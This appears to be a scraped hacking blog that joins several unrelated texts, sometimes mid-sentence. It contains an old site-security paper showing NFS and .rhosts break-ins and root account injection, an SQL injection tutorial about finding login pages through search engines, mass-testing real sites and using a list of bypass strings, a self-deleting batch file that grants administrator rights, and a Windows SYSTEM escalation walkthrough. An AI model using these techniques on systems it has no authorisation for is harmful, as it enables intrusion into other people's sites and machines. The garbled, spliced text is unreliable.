Improving the Security of Your Site by Breaking Into it
Introduction
------------
Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.
-----
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley .
Purdue. Sun. You name it, we've seen it broken into. Anything that is
on the Internet (and many that isn't) seems to be fairly easy game. Are
these targets unusual? What happened?
Fade to...
A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescense of the C64's 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless ".mil" site on his
hit list. "guest -- guest", "root -- root", and "system -- manager" all
fail. No matter. He has all night... he pencils the host off of his
list, and tiredly types in the next potential victim...
This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.
-----
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
uebermensch, or, literally translated into English, "over man."
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary -- there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.
Overview
--------
In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.
In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.
Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site -- or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work -- we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.
We want to stress that we will not merely run down a list of bugs or
security holes -- there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way -- one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.
We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people's systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs --
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.
There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.) It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
attacks are also covered here.
The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.
The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice --
one of our goals is to show just how dangerous it can be to ignore basic
security practices.
Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.
While exploring the methods and strategies discussed in this paper we we
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws -- usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn't use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.
Note that it isn't possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won't cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don't
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim's keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.
Gaining Information
-------------------
Let us assume that you are the head system administrator of Victim
Incorporated's network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system's security from the outside.
What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don't stop
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
-- information is power -- but for now we'll examine only our intended
target.
To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):
victim % finger @victim.com
[victim.com]
Login Name TTY Idle When Where
zen Dr. Fubar co 1d Wed 08:00 death.com
Good! A single idle user -- it is likely that no one will notice if you
actually manage to break in.
Now you try more tactics. As every finger devotee knows, fingering "@",
"0", and "", as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.
To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.
Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:
Login Home-dir Shell Last login, from where
----- -------- ----- ----------------------
root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
bin /bin Never logged in
nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
guest /export/foo /bin/sh Never logged in
ftp /home/ftp Never logged in
Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.
For instance, running showmount on your target reveals:
evil % showmount -e victim.com
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
Note that /export/foo is exported to the world; also note that this is
user guest's home directory. Time for your first break-in! In this
case, you'll mount the home directory of user "guest." Since you don't
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a "guest" account
in your local password file. As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.
evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
evil # su guest
evil % echo evil.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %
If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.
We suggest that filesystems be exported:
o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)
If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
various vendor's machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target's password
file can rlogin to the target without a password. And since the user
"bin" often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #
A few notes about the method used above; "rsh victim.comSQL injection Basic Tutorial
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
*******************************************
WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay
******************************************SATURDAY, OCTOBER 27, 2007
Helping Hacker Culture Grow
If you enjoyed the Jargon File, please help the culture that created it grow and flourish. Here are several ways you can help:
* If you are a writer or journalist, don't say or write hacker when you mean cracker. If you work with writers or journalists, educate them on this issue and push them to do the right thing. If you catch a newspaper or magazine abusing the work `hacker', write them and straigten them out (this appendix includes a model letter).
* If you're a techie or computer hobbyist, get involved with one of the free Unixes. Toss out that lame Microsoft OS, or confine it to one disk partition and put Linux or FreeBSD or NetBSD on the other one. And the next time your friend or boss is thinking about some commercial software `solution' that costs more than it's worth, be ready to blow the competition away with free software running over i free Unix.
* Contribute to organizations like the Free Software Foundation that promote the production of high-quality free software. You can reach the Free Software Foundation at gnu@prep.ai.mit.edu, by phone at +1-617-542-5942, or by snail-mail at 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
* Support the League for Programming Freedom, which opposes over-broad software patents that constantly threaten to blow up in hackers' faces, preventing them from developing innovative software for tomorrow's needs. You can reach the League for Programming Freedom at lpf@uunet.uu.net. by phone at +1 617 621 7084, or by snail-mail at 1 Kendall Square #143, P.O.Box 9171, Cambridge, Massachusetts 02139 USA.
* If you do nothing else, please help fight government attempts to seize political control of Internet content and restrict strong cryptography. As TNHD III went to press, the so-called `Communications Decency Act' had just been declared "unconstitutional on its face" by a Federal court, but the government is expected to appeal. If it's still law when you read this, please join the effort by the Citizens' Internet Empowerment Coalition lawsuit to have the CDA quashed or repealed. Surf to the Center for Democracy and technology's home page at http://www.cdt.org to see what you can do to help fight censorship of the net.
Here's the text of a letter RMS wrote to the Wall Street Journal to complain about their policy of using "hacker" only in a pejorative sense. We hear that most major newspapers have the same policy. If you'd like to help change this situation, send your favorite newspaper the same letter -- or, better yet, write your own letter.
Dear Editor:
This letter is not meant for publication, although you can publish it if you wish. It is meant specifically for you, the editor, not the public.
I am a hacker. That is to say, I enjoy playing with computers -- working with, learning about, and writing clever computer programs. I am not a cracker; I don't make a practice of breaking computer security.
There's nothing shameful about the hacking I do. But when I tell people I am a hacker, people think I'm admitting something naughty -- because newspapers such as yours misuse the word "hacker", giving the impression that it means "security breaker" and nothing else. You are giving hackers a bad name.
The saddest thing is that this problem is perpetuated deliberately. Your reporters know the difference between "hacker" and "security breaker". They know how to make the distinction, but you don't let them! You insist on using "hacker" pejoratively. When reporters try to use another word, you change it. When reporters try to explain the other meanings, you cut it.
Of course, you have a reason. You say that readers have become used to your insulting usage of "hacker", so that you cannot change it now. Well, you can't undo past mistakes today; but that is no excuse to repeat them tomorrow.
If I were what you call a "hacker", at this point I would threaten to crack your computer and crash it. But I am a hacker, not a cracker. I don't do that kind of thing! I have enough computers to play with at home and at work; I don't need yours. Besides, it's not my way to respond to insults with violence. My response is this letter.
You owe hackers an apology; but more than that, you owe us ordinary respect.
Sincerely, etc.MONDAY, SEPTEMBER 3, 2007
some links
http://www.showmyip.com/
http://sainathgupta-hacking.blogspot.com/
http://www.securitytaskforce.org/
http://www.blackhat.com/
http://www.blackhat.com/html/bh-usa-06/bh-usa-06-speakers.html
http://www.nag.co.in/ncise.htm
http://www.wtcs.org/snmp4tpc/freeware.htm
http://www.wireshark.org/
http://www.grc.com/default.htm
http://www.thinkdigit.com/index.php?action=pro_how_to&prodid=679
http://www.snort.org/
http://prasadswork.blogspot.com/
http://crack0hack.wetpaint.com/?t=anon
http://www.discoverhacking.c-o.in/
http://crack0hack.wetpaint.com/page/Best+Hacking+Softwares_+1000sw%28Free+download%29
http://www.remote-exploit.org/backtrack_download.html
http://crack0hack.wetpaint.com/rss2_0/pageReport/created?t=anonTHURSDAY, AUGUST 30, 2007
Hack admin from xp guest account(Thats possible )
Well thats possible ..
Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...
~ Cheers ~
* Haking "admin" from "user" mode n more
really that is possible !
u know why is it a "user" account because it lacks come service layer than that in "administrator" account
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:
You can trick the system into running a program, script, or batch file with system level privileges.
One sample
One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.
Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.
Quote:
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at
If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:
Code:
at 15:25 /interactive “cmd.exe”
Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:
When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:
You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):
System user name on start menu
explorer.exe running under SYSTEM
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!
Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.
EnjoyMONDAY, AUGUST 27, 2007
NetBios Basic Tutorial !
I bet u wanna try ur hands on Ethical Hacking but unaware of Basic NetBios, which stands as a very important aspect. n dis is d best explanation i can offer u, written in much simpler language.
~cheers~
Preface to NetBIOS
Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.
Whats is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.
NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.
NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.
When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:
1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.
3. If no other client on the network objects to the name registration, the client will finish the registration process.
There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]
The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.
Name Number Type Usage
==========================================================================
00 U Workstation Service
01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCPIP Service
52 U DEC Pathworks TCPIP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Apps
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
[2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:
nbtstat -A [ipaddress]
nbtstat -a [host]
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique. Some tool names
Hackers tools a reference ! BEWARE !!
AAh!!
The following tools m gonna list now are some of the dangerous tools available on www, which may be used on u by an unethical hacker. I want you to be well aware of all the possibilities.
